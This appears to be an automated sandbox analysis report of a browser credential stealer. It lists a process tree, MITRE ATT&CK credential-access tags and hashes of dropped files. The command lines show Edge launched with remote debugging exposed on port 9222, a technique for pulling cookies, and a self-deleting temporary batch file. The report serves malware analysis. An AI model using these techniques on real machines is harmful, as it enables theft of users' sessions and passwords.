C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --extension-process --renderer-sub-type=extension --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4248,i,14979827525723494413,11083120270441978976,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4244 /prefetch:25⤵
- Uses browser remote debugging
PID:3584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=3668,i,14979827525723494413,11083120270441978976,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3700 /prefetch:85⤵PID:5300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5208,i,14979827525723494413,11083120270441978976,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5204 /prefetch:85⤵PID:5628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=5252,i,14979827525723494413,11083120270441978976,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5264 /prefetch:15⤵
- Uses browser remote debugging
PID:5756
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=3588,i,14979827525723494413,11083120270441978976,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3684 /prefetch:85⤵PID:3300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5396,i,14979827525723494413,11083120270441978976,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5340 /prefetch:85⤵PID:1432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=6184,i,14979827525723494413,11083120270441978976,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=6180 /prefetch:85⤵PID:6092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=6184,i,14979827525723494413,11083120270441978976,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=6180 /prefetch:85⤵PID:6044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpA604.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpA604.tmp.bat4⤵PID:880
-
C:\Windows\system32\chcp.comchcp 650015⤵PID:464
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:2344
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:1148
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
649B
MD51dfaa809bb5e74fc9e95c62e50b3bb54
SHA1a9e032218590fa8af28e80f9eaa204662b08d4a5
SHA25604aa3809abec2dcc51dce76141efe34158a8ca19e8f1cf1d4939548f125b5695
SHA51244695f802cde9dfff4b0468bee03c6ba3338169a21c5a27a08c5ff31f0c59e7305410612a0bbd52ea27213d48a7646a9da5a5d3e4969f38a1a2fcf363879c75e
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
80KB
MD57de6f4f2af96617574ae6b801d935489
SHA180bf25f3b2da558f08eb6b4397d8f2bdbb6d5101
SHA25614cbf7e90befb62fcde8d4e93106a862820edff3600618873dd91b275ce32bed
SHA512e3f94ed0420f637c3083b53874f1e9aa080bad019a5581501a02a51b7dd3ca0c8cf3e3ab60bfe861db2090eb25f7f063a1c33967ab1db93564b317780bbdc1c8
-
Filesize
280B
MD5fed4ab68611c6ce720965bcb5dfbf546
SHA1af33fc71721625645993be6fcba5c5852e210864
SHA256c41acdf5d0a01d5e9720ef9f6d503099950791b6f975ba698ccd013c4defa8c4
SHA512f9ab23b3b4052f7fda6c9a3e8cd68056f21da5d0fcf28061331900cac6f31ef081705804d9a9d4103ee7d9c9bdb6aa4237987b7e821d2d96cd52da24219e55ee
-
Filesize
280B
MD54013ebc7b496bf70ecf9f6824832d4ae
SHA1cfdcdac5d8c939976c11525cf5e79c6a491c272a
SHA256fb1a67bdc2761f1f9e72bbc41b6fc0bf89c068205ffd0689e4f7e2c34264b22a
SHA51296822252f121fb358aa43d490bb5f5ce3a81c65c8de773c170f1d0e91da1e6beb83cb1fb9d4d656230344cd31c3dca51a6c421fda8e55598c364092232e0ad22
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\58c4ec48-5b78-49fb-b305-dccf097d1160.tmp
Filesize1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize
69KB
MD5164a788f50529fc93a6077e50675c617
SHA1c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48
SHA256b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17
SHA512ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\bb9a4039-5fee-44f8-a618-d20a135c468d\index-dir\the-real-index
Filesize648B
MD5a05209d7769f4f1932932c4e45585e00
SHA15f9718cbbbaeca3fd7a678825b82dfeb8ce08428
SHA25634f07af70b0299dfedffa328356be5c57b82a5caa4cfca15a990a9ad2d17b69f
SHA512ccacb276ed66ea95be302016814833f34438aeff579a038938bf8d51de04a7cafaa11e198760d341c39ca7a89db8b3b8472e0a7d56b403f933ca335816d65704
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\bb9a4039-5fee-44f8-a618-d20a135c468d\index-dir\the-real-index~RFe579385.TMP
Filesize648B
MD5a0ca7c3d4a066d6206f5b6d528414779
SHA18cd4bac7d35f97cbaf39d194a6e4db9505ba4669
SHA256a0d9f83e0f1f367681632bee1075c613096d8e53c05e0d6d9ec9a5c445d0b8ad
SHA512a23c47ec13c6ba4f431df2b38ef2dc3b0db79ec0a4ab0f156d5ac6f691b85d7e9a4fc3993647a45520f31f18fce87cfdeee4b88cc34e6cd029bbf6dfe29d9967
-
Filesize
6KB
MD57cf14ecce4d07de76ca40325750d9848
SHA1b8ee477c09791948c5cd2f674384f4d67d297dc0
SHA256430c4595f2ff9c4c39cb4dc80e382c56882e43c98c543e9c5ce67ff0dea60eae
SHA512b65a5ffe5adc919f77f27f98ddbd04dab027a512bb5a6174b5cb14f4fa87421abbb8e54354c2b6f0688d4e7f83c7930b8a76ed39f2970e50b5a6543bd2d0c708
-
Filesize
7KB
MD53fad1692852db354c0c605e1faaeef5e
SHA19c1cb3409f7e076c492805cba5727598fc9ac455
SHA2561e33eab4df0c7050325e03e46bdb9f20c57c606ee3b0a0bb47b18545e878a982
SHA512d8eafb680bb7c54730d7732d9d3b31058447a6f72fd4ce7570bd88b94ad66f41880201c3e0f18470d827d0bffd04031269e577df23f168f1dd361b16e927c2c0
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
Filesize2KB
MD5520990e84643a83654bd4ffd86a4beba
SHA13b9937a4841ec8955e4908f8541fcdcd894ec4c0
SHA256c21ff406b87b63a13f3836a591c0b66614539dff38c2411eaf6c73ac574bae9a
SHA512e7892e0794255eca9f569dc56edf0f10589df98228ba28fb6bc373082a3e25692ee86e2c2d10f1dd65b68d537c8b74275d6deba542b5219bb55eaaf884a9b564
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
152KB
MD5dd9bf8448d3ddcfd067967f01e8bf6d7
SHA1d7829475b2bd6a3baa8fabfaf39af57c6439b35e
SHA256fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72
SHA51265347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de
-
Filesize
371B
MD5c2648028d62574d698ce3c8cca6bec86
SHA142f7a0617ade5f55f349a1af7f80091d9a385845
SHA2568ceecc309c2428bcc7d293a58ed9589a37fb528e5f3e0146f05a2adde293a41e
SHA512bf6a8c14aabef23ff14ffa42b7ec8016181833ea31dede4c3d43c650bfce7976312d131d972e91de2418e8bc9abd5c3a1e75d9336e24b764765adf939c45ba27
-
Filesize
149B
MD59b50431381f90bb6149dbb5c85095c94
SHA13eed9d5a930e860d2308abec184946022a258a08
SHA256bc8d12c414c230d3c3d1e444a4a6af0bbe189ba0e810fd5aa3fd2873c5d32d4b
SHA512a581e798ff3db6780740d71e184b98acd42f11a7c7fcbf1416a3b24833a7b09a51487ef382eea5987d5bb3d4fc14cd12be0fef6ba388083b8818256cdfc30480
-
Filesize
228KB
MD5ee463e048e56b687d02521cd12788e2c
SHA1ee26598f8e8643df84711960e66a20ecbc6321b8
SHA2563a07b3003758a79a574aa73032076567870389751f2a959537257070da3a10d8
SHA51242b395bf6bd97da800385b9296b63a4b0edd7b3b50dc92f19e61a89235a42d37d204359b57d506e6b25ab95f16625cce035ed3b55ef2d54951c82332498dab0f
-
Filesize
5.7MB
MD5cd553ce7a31bac1a44b761dd831b1089
SHA1a54f6d76cc6576e661ac793b085aa2da04f57349
SHA256a808f1f3c67e9ce64442115e902b375f4b30628359460a284d05ab2d0fdbcea9
SHA51200a85f996c40fd76bef66b0678a1572e993991267aa44bf80359a9a264b97c22943ca5f4d1adfbc55f0d634185de97ccbbde1a6f4551694f6e56461a08db7cca